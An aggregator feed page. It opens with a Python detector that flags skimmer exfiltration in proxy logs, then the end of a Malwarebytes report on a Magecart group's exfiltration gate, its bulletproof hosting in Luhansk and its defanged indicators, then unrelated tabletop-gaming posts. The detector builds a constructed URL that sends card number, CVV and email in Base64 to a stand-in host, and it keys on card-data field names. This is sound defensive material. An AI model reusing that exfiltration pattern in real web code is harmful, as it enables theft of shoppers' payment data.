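Detection logic for the exfiltration pattern described above, as an added example that is not part of the original post: it scans proxy-log URLs for query values that Base64-decode to a JSON object with checkout-like keys. The host `gate.example`, the JSON field names, the `SENSITIVE_HINTS` list and the `min_len` threshold are assumptions, and all sample data is constructed.

```python
import base64, binascii, json
from urllib.parse import urlsplit, parse_qsl

# Key-name fragments that suggest checkout data (assumed list; tune locally).
SENSITIVE_HINTS = ("card", "cvv", "cvc", "expir", "email", "phone", "address")

def constructed_exfil_url():
    """Build a constructed request in the shape shown above (not real data)."""
    record = {"card_number": "4111111111111111", "cvv": "123",
              "email": "shopper@example.com"}
    blob = base64.b64encode(json.dumps(record).encode()).decode()
    return "https://gate.example/fonts.googleapis/savePing/?hash=" + blob

# Constructed proxy-log URLs: one exfiltration-shaped, two benign.
SAMPLE_URLS = [
    constructed_exfil_url(),
    "https://analytics.example/collect?v=1&tid=UA-000000-1&cid=555",
    "https://cdn.example/img?token=" + base64.b64encode(bytes(range(48))).decode(),
]

def decode_b64_json(value):
    """Return the dict if value is a Base64-encoded JSON object, else None."""
    padded = value + "=" * (-len(value) % 4)       # tolerate stripped padding
    padded = padded.replace("-", "+").replace("_", "/")  # accept URL-safe alphabet
    try:
        raw = base64.b64decode(padded, validate=True)
        obj = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError):           # bad Base64, bad UTF-8, bad JSON
        return None
    return obj if isinstance(obj, dict) else None

def find_exfil_candidates(urls, min_len=40):
    """Flag requests whose query carries Base64 JSON with sensitive-looking keys.
    Only key names are reported, so the alert itself never stores card data."""
    findings = []
    for url in urls:
        parts = urlsplit(url)
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if len(value) < min_len:
                continue
            # parse_qsl turns a literal '+' into a space; undo that before decoding.
            obj = decode_b64_json(value.replace(" ", "+"))
            if obj is None:
                continue
            keys = sorted(k for k in obj
                          if any(h in k.lower() for h in SENSITIVE_HINTS))
            if keys:
                findings.append({"host": parts.hostname, "param": param,
                                 "fields": keys})
    return findings

if __name__ == "__main__":
    for finding in find_exfil_candidates(SAMPLE_URLS):
        print(finding)
```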

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider. It’s quite likely the threat actors may be taking advantage of it.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

'Mi Go & Mythologies' More Old School & OSR Campaign Workshop

Swords & Stitchery - Thu, 07/18/2019 - 14:52
We've had some pop up thunderstorms & 'what not' weather here so I've been down under the weather today. But my mind's been churning over & over about this Godbound rpg campaign. I've been writing in the back of my mind between work jobs. One of the primary foes that I had for my early games were the Mi Go. Specifically, the Mi Go of the early original Dragon Magazine #12 (Feb 1978) which
Categories: Tabletop Gaming Blogs

Spelljammer: Dead Stars & Outer Monstrosities

Sorcerer's Skull - Thu, 07/18/2019 - 11:00
Art from the Oldstyle Tales Press edition

"As we understand the word," said the old Doctor. "Though, mind you, there may be a third factor. But, in my heart, I believe that it is a matter of chemistry; Conditions and a suitable medium; but given the Conditions, the Brute is so almighty that it will seize upon anything through which to manifest itself. It is a Force generated by Conditions; but nevertheless this does not bring us one iota nearer to its explanation, any more than to the explanation of Electricity or Fire. They are, all three, of the Outer Forces—Monsters of the Void.... - William Hope Hodgson, "The Derelict"
I've been thinking about a Spelljammer recently that keeps the basic concept but utterly jettisons the feel or flavor. Spelljammer has never felt to me to be about exploration, rather the vessels flying through spaces seem a means to an end. There's nothing wrong with that, but plenty of science fiction literature paints space as a place for confronting the unknown. This is really a perfect fit for Spelljammer where its pre-modern, "magical" spacecraft put the stars within reach but not the science to understand any of it. Not that there is necessarily science as we know it to understand, in any case.
I think I would look to the horror/adventure stories of William Hope Hodgson, specifically his nautical yarns like The Boats of the Glen Carrig, "The Voice in the Night," "A Tropical Horror," and "Demons of the Sea." A little pseudo-science borrowed from his Carnacki stories could only help.
The characters are competent space-hands, perhaps mildly colorful rogues like Howard's Wild Bill Clanton or just working stiffs like the crew of the Nostromo in Alien, not bold explorers or science fantasy swashbucklers. Their jobs involve them going through places that are not (usually) inhabited by hostile species of space orcs or the like, but are instead fundamentally almost wild, always strange. Weird danger can rear its head at any time, and your vessel is just another ship that disappeared in the Void.
Weird phenomena should be encountered as frequently as monsters, I think. Monsters, when they do show up should be unfamiliar, and probably not seen enough to become mundane.
Beyond the stories of Hodgson and Alien, other potential sources of inspiration could be the comic series Outer Darkness, the science fiction stories of Clark Ashton Smith, Poe's Narrative of Arthur Gordon Pym, and of course, Moby Dick.

1314

Looking For Group - Thu, 07/18/2019 - 04:00

The post 1314 appeared first on Looking For Group.

Categories: Web Comics

Juggers coming! Juggers coming!

Two Hour Wargames - Wed, 07/17/2019 - 22:51
Just got Qwik back from the editor. Look for some final Bat Reps and the game to be released sometime next week. And then there's After the Horsemen End Times, but that's another story.  
Categories: Tabletop Gaming Blogs

Don't Even Fix A Price - Astonishing Swordsmen & Sorcerers of Hyperborea Actual Play Session Report II

Swords & Stitchery - Wed, 07/17/2019 - 15:33
Further bits from last night's Astonishing Swordsmen & Sorcerers of Hyperborea game with DM Steve. We began the exploration of the inner workings of the sink hole with our two thieves rappelling into the void with a pair of expensive silk & spiderweb ropes we had picked up back in the capital. They had short swords & mini wrist crossbows at the ready. We didn't have long to wait till we heard
Categories: Tabletop Gaming Blogs

On the Spreading Word

Hack & Slash - Wed, 07/17/2019 - 14:39
Megadungeon #4 is coming, in about a week.

But there's something that needs to be done first.

The exciting part is discovering new worlds and spaces. How do I do that? Well, last time I sold some advertisements for things. And that was nice, and it got the word out about some great things to people who might not have ever considered them before.

But what I really want is the interesting feeling of looking through the ads in the back of old Dragon magazines. The pages with all the weird cool stuff.

So, look. I'm "Selling" advertising space. It's 20$ for a half page, 40$ for a full A5 page.
Except, if you don't have the money, and you have a project, you should go ahead and send me an ad.

It's more important to get the word out about a cool thing than it is to restrict access to letting people know about cool stuff.

It doesn't even have to be visual—if you have a small blurb about a product or your company, one that hundreds of buyers who are getting a 5e/basic megadungeon would be interested in, do not let this opportunity go away.

Advertisements, questions and comments as well as advertisement payments (on paypal) can be sent to campbell at oook dot cz. The "deadline" for getting me your stuff or reserving a slot is Friday—let me know by then. But you'll actually have a bit longer to get it together.

Categories: Tabletop Gaming Blogs

Subscribe to Furiously Eclectic People aggregator